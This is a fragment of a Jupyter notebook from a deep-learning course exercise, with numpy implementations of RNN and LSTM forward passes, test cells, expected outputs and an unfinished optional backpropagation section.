"# GRADED FUNCTION: rnn_cell_forward\n\ndef rnn_cell_forward(xt, a_prev, parameters):\n \"\"\"\n Implements a single forward step of the RNN-cell as described in Figure (2)\n\n Arguments:\n xt -- your input data at timestep \"t\", numpy array of shape (n_x, m).\n a_prev -- Hidden state at timestep \"t-1\", numpy array of shape (n_a, m)\n parameters -- python dictionary containing:\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n ba -- Bias, numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n Returns:\n a_next -- next hidden state, of shape (n_a, m)\n yt_pred -- prediction at timestep \"t\", numpy array of shape (n_y, m)\n cache -- tuple of values needed for the backward pass, contains (a_next, a_prev, xt, parameters)\n \"\"\"\n \n # Retrieve parameters from \"parameters\"\n Wax = parameters[\"Wax\"]\n Waa = parameters[\"Waa\"]\n Wya = parameters[\"Wya\"]\n ba = parameters[\"ba\"]\n by = parameters[\"by\"]\n \n ### START CODE HERE ### (≈2 lines)\n # compute next activation state using the formula given above\n a_next = np.tanh( np.matmul(Wax,xt) + np.matmul(Waa,a_prev) + ba )\n # compute output of the current cell using the formula given above\n yt_pred = softmax( np.matmul(Wya,a_next) + by )\n ### END CODE HERE ###\n \n # store values you need for backward propagation in cache\n cache = (a_next, a_prev, xt, parameters)\n \n return a_next, yt_pred, cache",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nWaa = np.random.randn(5,5)\nWax = np.random.randn(5,3)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Waa\": Waa, \"Wax\": Wax, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na_next, yt_pred, cache = rnn_cell_forward(xt, a_prev, parameters)\nprint(\"a_next[4] = \", a_next[4])\nprint(\"a_next.shape = \", a_next.shape)\nprint(\"yt_pred[1] =\", yt_pred[1])\nprint(\"yt_pred.shape = \", yt_pred.shape)",
"a_next[4] = [ 0.59584544 0.18141802 0.61311866 0.99808218 0.85016201 0.99980978\n -0.18887155 0.99815551 0.6531151 0.82872037]\na_next.shape = (5, 10)\nyt_pred[1] = [ 0.9888161 0.01682021 0.21140899 0.36817467 0.98988387 0.88945212\n 0.36920224 0.9966312 0.9982559 0.17746526]\nyt_pred.shape = (2, 10)\n"
]
],
[
[
"**Expected Output**: \n\n<table>\n <tr>\n <td>\n **a_next[4]**:\n </td>\n <td>\n [ 0.59584544 0.18141802 0.61311866 0.99808218 0.85016201 0.99980978\n -0.18887155 0.99815551 0.6531151 0.82872037]\n </td>\n </tr>\n <tr>\n <td>\n **a_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **yt[1]**:\n </td>\n <td>\n [ 0.9888161 0.01682021 0.21140899 0.36817467 0.98988387 0.88945212\n 0.36920224 0.9966312 0.9982559 0.17746526]\n </td>\n </tr>\n <tr>\n <td>\n **yt.shape**:\n </td>\n <td>\n (2, 10)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"## 1.2 - RNN forward pass \n\nYou can see an RNN as the repetition of the cell you've just built. If your input sequence of data is carried over 10 time steps, then you will copy the RNN cell 10 times. Each cell takes as input the hidden state from the previous cell ($a^{\\langle t-1 \\rangle}$) and the current time-step's input data ($x^{\\langle t \\rangle}$). It outputs a hidden state ($a^{\\langle t \\rangle}$) and a prediction ($y^{\\langle t \\rangle}$) for this time-step.\n\n\n<img src=\"images/rnn.png\" style=\"width:800px;height:300px;\">\n<caption><center> **Figure 3**: Basic RNN. The input sequence $x = (x^{\\langle 1 \\rangle}, x^{\\langle 2 \\rangle}, ..., x^{\\langle T_x \\rangle})$ is carried over $T_x$ time steps. The network outputs $y = (y^{\\langle 1 \\rangle}, y^{\\langle 2 \\rangle}, ..., y^{\\langle T_x \\rangle})$. </center></caption>\n\n\n\n**Exercise**: Code the forward propagation of the RNN described in Figure (3).\n\n**Instructions**:\n1. Create a vector of zeros ($a$) that will store all the hidden states computed by the RNN.\n2. Initialize the \"next\" hidden state as $a_0$ (initial hidden state).\n3. Start looping over each time step, your incremental index is $t$ :\n - Update the \"next\" hidden state and the cache by running `rnn_cell_forward`\n - Store the \"next\" hidden state in $a$ ($t^{th}$ position) \n - Store the prediction in y\n - Add the cache to the list of caches\n4. Return $a$, $y$ and caches",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: rnn_forward\n\ndef rnn_forward(x, a0, parameters):\n \"\"\"\n Implement the forward propagation of the recurrent neural network described in Figure (3).\n\n Arguments:\n x -- Input data for every time-step, of shape (n_x, m, T_x).\n a0 -- Initial hidden state, of shape (n_a, m)\n parameters -- python dictionary containing:\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n ba -- Bias numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n\n Returns:\n a -- Hidden states for every time-step, numpy array of shape (n_a, m, T_x)\n y_pred -- Predictions for every time-step, numpy array of shape (n_y, m, T_x)\n caches -- tuple of values needed for the backward pass, contains (list of caches, x)\n \"\"\"\n \n # Initialize \"caches\" which will contain the list of all caches\n caches = []\n \n # Retrieve dimensions from shapes of x and parameters[\"Wya\"]\n n_x, m, T_x = x.shape\n n_y, n_a = parameters[\"Wya\"].shape\n \n ### START CODE HERE ###\n \n # initialize \"a\" and \"y\" with zeros (≈2 lines)\n a = np.zeros( (n_a, m, T_x), dtype=np.float )\n y_pred = np.zeros( (n_y, m, T_x), dtype=np.float )\n \n # Initialize a_next (≈1 line)\n a_next = a0\n \n # loop over all time-steps\n for t in range(T_x):\n # Update next hidden state, compute the prediction, get the cache (≈1 line)\n a_next, yt_pred, cache = rnn_cell_forward(x[:,:,t], a_next, parameters)\n # Save the value of the new \"next\" hidden state in a (≈1 line)\n a[:,:,t] = a_next\n # Save the value of the prediction in y (≈1 line)\n y_pred[:,:,t] = yt_pred\n # Append \"cache\" to \"caches\" (≈1 line)\n caches.append(cache)\n \n ### END CODE HERE ###\n \n # store values needed for backward propagation in cache\n caches = (caches, x)\n \n return a, y_pred, caches",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,4)\na0 = np.random.randn(5,10)\nWaa = np.random.randn(5,5)\nWax = np.random.randn(5,3)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Waa\": Waa, \"Wax\": Wax, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na, y_pred, caches = rnn_forward(x, a0, parameters)\nprint(\"a[4][1] = \", a[4][1])\nprint(\"a.shape = \", a.shape)\nprint(\"y_pred[1][3] =\", y_pred[1][3])\nprint(\"y_pred.shape = \", y_pred.shape)\nprint(\"caches[1][1][3] =\", caches[1][1][3])\nprint(\"len(caches) = \", len(caches))",
"a[4][1] = [-0.99999375 0.77911235 -0.99861469 -0.99833267]\na.shape = (5, 10, 4)\ny_pred[1][3] = [ 0.79560373 0.86224861 0.11118257 0.81515947]\ny_pred.shape = (2, 10, 4)\ncaches[1][1][3] = [-1.1425182 -0.34934272 -0.20889423 0.58662319]\nlen(caches) = 2\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a[4][1]**:\n </td>\n <td>\n [-0.99999375 0.77911235 -0.99861469 -0.99833267]\n </td>\n </tr>\n <tr>\n <td>\n **a.shape**:\n </td>\n <td>\n (5, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **y[1][3]**:\n </td>\n <td>\n [ 0.79560373 0.86224861 0.11118257 0.81515947]\n </td>\n </tr>\n <tr>\n <td>\n **y.shape**:\n </td>\n <td>\n (2, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **cache[1][1][3]**:\n </td>\n <td>\n [-1.1425182 -0.34934272 -0.20889423 0.58662319]\n </td>\n </tr>\n <tr>\n <td>\n **len(cache)**:\n </td>\n <td>\n 2\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"Congratulations! You've successfully built the forward propagation of a recurrent neural network from scratch. This will work well enough for some applications, but it suffers from vanishing gradient problems. So it works best when each output $y^{\\langle t \\rangle}$ can be estimated using mainly \"local\" context (meaning information from inputs $x^{\\langle t' \\rangle}$ where $t'$ is not too far from $t$). \n\nIn the next part, you will build a more complex LSTM model, which is better at addressing vanishing gradients. The LSTM will be better able to remember a piece of information and keep it saved for many timesteps. ",
"_____no_output_____"
],
[
"## 2 - Long Short-Term Memory (LSTM) network\n\nThis following figure shows the operations of an LSTM-cell.\n\n<img src=\"images/LSTM.png\" style=\"width:500;height:400px;\">\n<caption><center> **Figure 4**: LSTM-cell. This tracks and updates a \"cell state\" or memory variable $c^{\\langle t \\rangle}$ at every time-step, which can be different from $a^{\\langle t \\rangle}$. </center></caption>\n\nSimilar to the RNN example above, you will start by implementing the LSTM cell for a single time-step. Then you can iteratively call it from inside a for-loop to have it process an input with $T_x$ time-steps. \n\n### About the gates\n\n#### - Forget gate\n\nFor the sake of this illustration, let's assume we are reading words in a piece of text, and want use an LSTM to keep track of grammatical structures, such as whether the subject is singular or plural. If the subject changes from a singular word to a plural word, we need to find a way to get rid of our previously stored memory value of the singular/plural state. In an LSTM, the forget gate let's us do this: \n\n$$\\Gamma_f^{\\langle t \\rangle} = \\sigma(W_f[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_f)\\tag{1} $$\n\nHere, $W_f$ are weights that govern the forget gate's behavior. We concatenate $[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}]$ and multiply by $W_f$. The equation above results in a vector $\\Gamma_f^{\\langle t \\rangle}$ with values between 0 and 1. This forget gate vector will be multiplied element-wise by the previous cell state $c^{\\langle t-1 \\rangle}$. So if one of the values of $\\Gamma_f^{\\langle t \\rangle}$ is 0 (or close to 0) then it means that the LSTM should remove that piece of information (e.g. the singular subject) in the corresponding component of $c^{\\langle t-1 \\rangle}$. If one of the values is 1, then it will keep the information. \n\n#### - Update gate\n\nOnce we forget that the subject being discussed is singular, we need to find a way to update it to reflect that the new subject is now plural. Here is the formula for the update gate: \n\n$$\\Gamma_u^{\\langle t \\rangle} = \\sigma(W_u[a^{\\langle t-1 \\rangle}, x^{\\{t\\}}] + b_u)\\tag{2} $$ \n\nSimilar to the forget gate, here $\\Gamma_u^{\\langle t \\rangle}$ is again a vector of values between 0 and 1. This will be multiplied element-wise with $\\tilde{c}^{\\langle t \\rangle}$, in order to compute $c^{\\langle t \\rangle}$.\n\n#### - Updating the cell \n\nTo update the new subject we need to create a new vector of numbers that we can add to our previous cell state. The equation we use is: \n\n$$ \\tilde{c}^{\\langle t \\rangle} = \\tanh(W_c[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_c)\\tag{3} $$\n\nFinally, the new cell state is: \n\n$$ c^{\\langle t \\rangle} = \\Gamma_f^{\\langle t \\rangle}* c^{\\langle t-1 \\rangle} + \\Gamma_u^{\\langle t \\rangle} *\\tilde{c}^{\\langle t \\rangle} \\tag{4} $$\n\n\n#### - Output gate\n\nTo decide which outputs we will use, we will use the following two formulas: \n\n$$ \\Gamma_o^{\\langle t \\rangle}= \\sigma(W_o[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_o)\\tag{5}$$ \n$$ a^{\\langle t \\rangle} = \\Gamma_o^{\\langle t \\rangle}* \\tanh(c^{\\langle t \\rangle})\\tag{6} $$\n\nWhere in equation 5 you decide what to output using a sigmoid function and in equation 6 you multiply that by the $\\tanh$ of the previous state. ",
"_____no_output_____"
],
[
"### 2.1 - LSTM cell\n\n**Exercise**: Implement the LSTM cell described in the Figure (3).\n\n**Instructions**:\n1. Concatenate $a^{\\langle t-1 \\rangle}$ and $x^{\\langle t \\rangle}$ in a single matrix: $concat = \\begin{bmatrix} a^{\\langle t-1 \\rangle} \\\\ x^{\\langle t \\rangle} \\end{bmatrix}$\n2. Compute all the formulas 1-6. You can use `sigmoid()` (provided) and `np.tanh()`.\n3. Compute the prediction $y^{\\langle t \\rangle}$. You can use `softmax()` (provided).",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: lstm_cell_forward\n\ndef lstm_cell_forward(xt, a_prev, c_prev, parameters):\n \"\"\"\n Implement a single forward step of the LSTM-cell as described in Figure (4)\n\n Arguments:\n xt -- your input data at timestep \"t\", numpy array of shape (n_x, m).\n a_prev -- Hidden state at timestep \"t-1\", numpy array of shape (n_a, m)\n c_prev -- Memory state at timestep \"t-1\", numpy array of shape (n_a, m)\n parameters -- python dictionary containing:\n Wf -- Weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n bf -- Bias of the forget gate, numpy array of shape (n_a, 1)\n Wi -- Weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n bi -- Bias of the update gate, numpy array of shape (n_a, 1)\n Wc -- Weight matrix of the first \"tanh\", numpy array of shape (n_a, n_a + n_x)\n bc -- Bias of the first \"tanh\", numpy array of shape (n_a, 1)\n Wo -- Weight matrix of the output gate, numpy array of shape (n_a, n_a + n_x)\n bo -- Bias of the output gate, numpy array of shape (n_a, 1)\n Wy -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n \n Returns:\n a_next -- next hidden state, of shape (n_a, m)\n c_next -- next memory state, of shape (n_a, m)\n yt_pred -- prediction at timestep \"t\", numpy array of shape (n_y, m)\n cache -- tuple of values needed for the backward pass, contains (a_next, c_next, a_prev, c_prev, xt, parameters)\n \n Note: ft/it/ot stand for the forget/update/output gates, cct stands for the candidate value (c tilde),\n c stands for the memory value\n \"\"\"\n\n # Retrieve parameters from \"parameters\"\n Wf = parameters[\"Wf\"]\n bf = parameters[\"bf\"]\n Wi = parameters[\"Wi\"]\n bi = parameters[\"bi\"]\n Wc = parameters[\"Wc\"]\n bc = parameters[\"bc\"]\n Wo = parameters[\"Wo\"]\n bo = parameters[\"bo\"]\n Wy = parameters[\"Wy\"]\n by = parameters[\"by\"]\n \n # Retrieve dimensions from shapes of xt and Wy\n n_x, m = xt.shape\n n_y, n_a = Wy.shape\n\n ### START CODE HERE ###\n # Concatenate a_prev and xt (≈3 lines)\n concat = np.concatenate((a_prev, xt), axis=0)\n #concat[: n_a, :] = None\n #concat[n_a :, :] = None\n\n # Compute values for ft, it, cct, c_next, ot, a_next using the formulas given figure (4) (≈6 lines)\n ft = sigmoid( np.matmul( Wf, concat ) + bf )\n it = sigmoid( np.matmul( Wi, concat ) + bi )\n cct = np.tanh( np.matmul( Wc, concat ) + bc )\n c_next = ft*c_prev + it*cct\n ot = sigmoid( np.matmul( Wo, concat )+ bo )\n a_next = ot*np.tanh(c_next)\n \n # Compute prediction of the LSTM cell (≈1 line)\n yt_pred = softmax(np.matmul(Wy,a_next)+by)\n ### END CODE HERE ###\n\n # store values needed for backward propagation in cache\n cache = (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters)\n\n return a_next, c_next, yt_pred, cache",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nc_prev = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na_next, c_next, yt, cache = lstm_cell_forward(xt, a_prev, c_prev, parameters)\nprint(\"a_next[4] = \", a_next[4])\nprint(\"a_next.shape = \", c_next.shape)\nprint(\"c_next[2] = \", c_next[2])\nprint(\"c_next.shape = \", c_next.shape)\nprint(\"yt[1] =\", yt[1])\nprint(\"yt.shape = \", yt.shape)\nprint(\"cache[1][3] =\", cache[1][3])\nprint(\"len(cache) = \", len(cache))",
"a_next[4] = [-0.66408471 0.0036921 0.02088357 0.22834167 -0.85575339 0.00138482\n 0.76566531 0.34631421 -0.00215674 0.43827275]\na_next.shape = (5, 10)\nc_next[2] = [ 0.63267805 1.00570849 0.35504474 0.20690913 -1.64566718 0.11832942\n 0.76449811 -0.0981561 -0.74348425 -0.26810932]\nc_next.shape = (5, 10)\nyt[1] = [ 0.79913913 0.15986619 0.22412122 0.15606108 0.97057211 0.31146381\n 0.00943007 0.12666353 0.39380172 0.07828381]\nyt.shape = (2, 10)\ncache[1][3] = [-0.16263996 1.03729328 0.72938082 -0.54101719 0.02752074 -0.30821874\n 0.07651101 -1.03752894 1.41219977 -0.37647422]\nlen(cache) = 10\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a_next[4]**:\n </td>\n <td>\n [-0.66408471 0.0036921 0.02088357 0.22834167 -0.85575339 0.00138482\n 0.76566531 0.34631421 -0.00215674 0.43827275]\n </td>\n </tr>\n <tr>\n <td>\n **a_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **c_next[2]**:\n </td>\n <td>\n [ 0.63267805 1.00570849 0.35504474 0.20690913 -1.64566718 0.11832942\n 0.76449811 -0.0981561 -0.74348425 -0.26810932]\n </td>\n </tr>\n <tr>\n <td>\n **c_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **yt[1]**:\n </td>\n <td>\n [ 0.79913913 0.15986619 0.22412122 0.15606108 0.97057211 0.31146381\n 0.00943007 0.12666353 0.39380172 0.07828381]\n </td>\n </tr>\n <tr>\n <td>\n **yt.shape**:\n </td>\n <td>\n (2, 10)\n </td>\n </tr>\n <tr>\n <td>\n **cache[1][3]**:\n </td>\n <td>\n [-0.16263996 1.03729328 0.72938082 -0.54101719 0.02752074 -0.30821874\n 0.07651101 -1.03752894 1.41219977 -0.37647422]\n </td>\n </tr>\n <tr>\n <td>\n **len(cache)**:\n </td>\n <td>\n 10\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"### 2.2 - Forward pass for LSTM\n\nNow that you have implemented one step of an LSTM, you can now iterate this over this using a for-loop to process a sequence of $T_x$ inputs. \n\n<img src=\"images/LSTM_rnn.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 5**: LSTM over multiple time-steps. </center></caption>\n\n**Exercise:** Implement `lstm_forward()` to run an LSTM over $T_x$ time-steps. \n\n**Note**: $c^{\\langle 0 \\rangle}$ is initialized with zeros.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: lstm_forward\n\ndef lstm_forward(x, a0, parameters):\n \"\"\"\n Implement the forward propagation of the recurrent neural network using an LSTM-cell described in Figure (4).\n\n Arguments:\n x -- Input data for every time-step, of shape (n_x, m, T_x).\n a0 -- Initial hidden state, of shape (n_a, m)\n parameters -- python dictionary containing:\n Wf -- Weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n bf -- Bias of the forget gate, numpy array of shape (n_a, 1)\n Wi -- Weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n bi -- Bias of the update gate, numpy array of shape (n_a, 1)\n Wc -- Weight matrix of the first \"tanh\", numpy array of shape (n_a, n_a + n_x)\n bc -- Bias of the first \"tanh\", numpy array of shape (n_a, 1)\n Wo -- Weight matrix of the output gate, numpy array of shape (n_a, n_a + n_x)\n bo -- Bias of the output gate, numpy array of shape (n_a, 1)\n Wy -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n \n Returns:\n a -- Hidden states for every time-step, numpy array of shape (n_a, m, T_x)\n y -- Predictions for every time-step, numpy array of shape (n_y, m, T_x)\n caches -- tuple of values needed for the backward pass, contains (list of all the caches, x)\n \"\"\"\n\n # Initialize \"caches\", which will track the list of all the caches\n caches = []\n \n ### START CODE HERE ###\n # Retrieve dimensions from shapes of x and parameters['Wy'] (≈2 lines)\n n_x, m, T_x = x.shape\n n_y, n_a = parameters['Wy'].shape\n \n # initialize \"a\", \"c\" and \"y\" with zeros (≈3 lines)\n a = np.zeros( (n_a,m,T_x), dtype=np.float )\n c = np.zeros( (n_a,m,T_x), dtype=np.float )\n y = np.zeros( (n_y,m,T_x), dtype=np.float )\n \n # Initialize a_next and c_next (≈2 lines)\n a_next = a0\n c_next = np.zeros_like(a_next)\n \n # loop over all time-steps\n for t in range(T_x):\n # Update next hidden state, next memory state, compute the prediction, get the cache (≈1 line)\n a_next, c_next, yt, cache = lstm_cell_forward(x[:,:,t], a_next, c_next, parameters)\n # Save the value of the new \"next\" hidden state in a (≈1 line)\n a[:,:,t] = a_next\n # Save the value of the prediction in y (≈1 line)\n y[:,:,t] = yt\n # Save the value of the next cell state (≈1 line)\n c[:,:,t] = c_next\n # Append the cache into caches (≈1 line)\n caches.append(cache)\n \n ### END CODE HERE ###\n \n # store values needed for backward propagation in cache\n caches = (caches, x)\n\n return a, y, c, caches",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,7)\na0 = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na, y, c, caches = lstm_forward(x, a0, parameters)\nprint(\"a[4][3][6] = \", a[4][3][6])\nprint(\"a.shape = \", a.shape)\nprint(\"y[1][4][3] =\", y[1][4][3])\nprint(\"y.shape = \", y.shape)\nprint(\"caches[1][1[1]] =\", caches[1][1][1])\nprint(\"c[1][2][1]\", c[1][2][1])\nprint(\"len(caches) = \", len(caches))",
"a[4][3][6] = 0.172117767533\na.shape = (5, 10, 7)\ny[1][4][3] = 0.95087346185\ny.shape = (2, 10, 7)\ncaches[1][1[1]] = [ 0.82797464 0.23009474 0.76201118 -0.22232814 -0.20075807 0.18656139\n 0.41005165]\nc[1][2][1] -0.855544916718\nlen(caches) = 2\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a[4][3][6]** =\n </td>\n <td>\n 0.172117767533\n </td>\n </tr>\n <tr>\n <td>\n **a.shape** =\n </td>\n <td>\n (5, 10, 7)\n </td>\n </tr>\n <tr>\n <td>\n **y[1][4][3]** =\n </td>\n <td>\n 0.95087346185\n </td>\n </tr>\n <tr>\n <td>\n **y.shape** =\n </td>\n <td>\n (2, 10, 7)\n </td>\n </tr>\n <tr>\n <td>\n **caches[1][1][1]** =\n </td>\n <td>\n [ 0.82797464 0.23009474 0.76201118 -0.22232814 -0.20075807 0.18656139\n 0.41005165]\n </td>\n \n </tr>\n <tr>\n <td>\n **c[1][2][1]** =\n </td>\n <td>\n -0.855544916718\n </td>\n </tr> \n \n </tr>\n <tr>\n <td>\n **len(caches)** =\n </td>\n <td>\n 2\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"Congratulations! You have now implemented the forward passes for the basic RNN and the LSTM. When using a deep learning framework, implementing the forward pass is sufficient to build systems that achieve great performance. \n\nThe rest of this notebook is optional, and will not be graded.",
"_____no_output_____"
],
[
"## 3 - Backpropagation in recurrent neural networks (OPTIONAL / UNGRADED)\n\nIn modern deep learning frameworks, you only have to implement the forward pass, and the framework takes care of the backward pass, so most deep learning engineers do not need to bother with the details of the backward pass. If however you are an expert in calculus and want to see the details of backprop in RNNs, you can work through this optional portion of the notebook. \n\nWhen in an earlier course you implemented a simple (fully connected) neural network, you used backpropagation to compute the derivatives with respect to the cost to update the parameters. Similarly, in recurrent neural networks you can to calculate the derivatives with respect to the cost in order to update the parameters. The backprop equations are quite complicated and we did not derive them in lecture. However, we will briefly present them below. ",
"_____no_output_____"
],
[
"### 3.1 - Basic RNN backward pass\n\nWe will start by computing the backward pass for the basic RNN-cell.\n\n<img src=\"images/rnn_cell_backprop.png\" style=\"width:500;height:300px;\"> <br>\n<caption><center> **Figure 6**: RNN-cell's backward pass. Just like in a fully-connected neural network, the derivative of the cost function $J$ backpropagates through the RNN by following the chain-rule from calculus. The chain-rule is also used to calculate $(\\frac{\\partial J}{\\partial W_{ax}},\\frac{\\partial J}{\\partial W_{aa}},\\frac{\\partial J}{\\partial b})$ to update the parameters $(W_{ax}, W_{aa}, b_a)$. </center></caption>",
"_____no_output_____"
],
[
"#### Deriving the one step backward functions: \n\nTo compute the `rnn_cell_backward` you need to compute the following equations. It is a good exercise to derive them by hand. \n\nThe derivative of $\\tanh$ is $1-\\tanh(x)^2$. You can find the complete proof [here](https://www.wyzant.com/resources/lessons/math/calculus/derivative_proofs/tanx). Note that: $ \\text{sech}(x)^2 = 1 - \\tanh(x)^2$\n\nSimilarly for $\\frac{ \\partial a^{\\langle t \\rangle} } {\\partial W_{ax}}, \\frac{ \\partial a^{\\langle t \\rangle} } {\\partial W_{aa}}, \\frac{ \\partial a^{\\langle t \\rangle} } {\\partial b}$, the derivative of $\\tanh(u)$ is $(1-\\tanh(u)^2)du$. \n\nThe final two equations also follow same rule and are derived using the $\\tanh$ derivative. Note that the arrangement is done in a way to get the same dimensions to match.",
"_____no_output_____"
]
],
[
[
"def rnn_cell_backward(da_next, cache):\n \"\"\"\n Implements the backward pass for the RNN-cell (single time-step).\n\n Arguments:\n da_next -- Gradient of loss with respect to next hidden state\n cache -- python dictionary containing useful values (output of rnn_cell_forward())\n\n Returns:\n gradients -- python dictionary containing:\n dx -- Gradients of input data, of shape (n_x, m)\n da_prev -- Gradients of previous hidden state, of shape (n_a, m)\n dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)\n dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)\n dba -- Gradients of bias vector, of shape (n_a, 1)\n \"\"\"\n \n # Retrieve values from cache\n (a_next, a_prev, xt, parameters) = cache\n \n # Retrieve values from parameters\n Wax = parameters[\"Wax\"]\n Waa = parameters[\"Waa\"]\n Wya = parameters[\"Wya\"]\n ba = parameters[\"ba\"]\n by = parameters[\"by\"]\n\n ### START CODE HERE ###\n # compute the gradient of tanh with respect to a_next (≈1 line)\n dtanh = None\n\n # compute the gradient of the loss with respect to Wax (≈2 lines)\n dxt = None\n dWax = None\n\n # compute the gradient with respect to Waa (≈2 lines)\n da_prev = None\n dWaa = None\n\n # compute the gradient with respect to b (≈1 line)\n dba = None\n\n ### END CODE HERE ###\n \n # Store the gradients in a python dictionary\n gradients = {\"dxt\": dxt, \"da_prev\": da_prev, \"dWax\": dWax, \"dWaa\": dWaa, \"dba\": dba}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nWax = np.random.randn(5,3)\nWaa = np.random.randn(5,5)\nWya = np.random.randn(2,5)\nb = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na_next, yt, cache = rnn_cell_forward(xt, a_prev, parameters)\n\nda_next = np.random.randn(5,10)\ngradients = rnn_cell_backward(da_next, cache)\nprint(\"gradients[\\\"dxt\\\"][1][2] =\", gradients[\"dxt\"][1][2])\nprint(\"gradients[\\\"dxt\\\"].shape =\", gradients[\"dxt\"].shape)\nprint(\"gradients[\\\"da_prev\\\"][2][3] =\", gradients[\"da_prev\"][2][3])\nprint(\"gradients[\\\"da_prev\\\"].shape =\", gradients[\"da_prev\"].shape)\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWax\\\"].shape =\", gradients[\"dWax\"].shape)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWaa\\\"].shape =\", gradients[\"dWaa\"].shape)\nprint(\"gradients[\\\"dba\\\"][4] =\", gradients[\"dba\"][4])\nprint(\"gradients[\\\"dba\\\"].shape =\", gradients[\"dba\"].shape)",
"_____no_output_____"
]
],
[
[
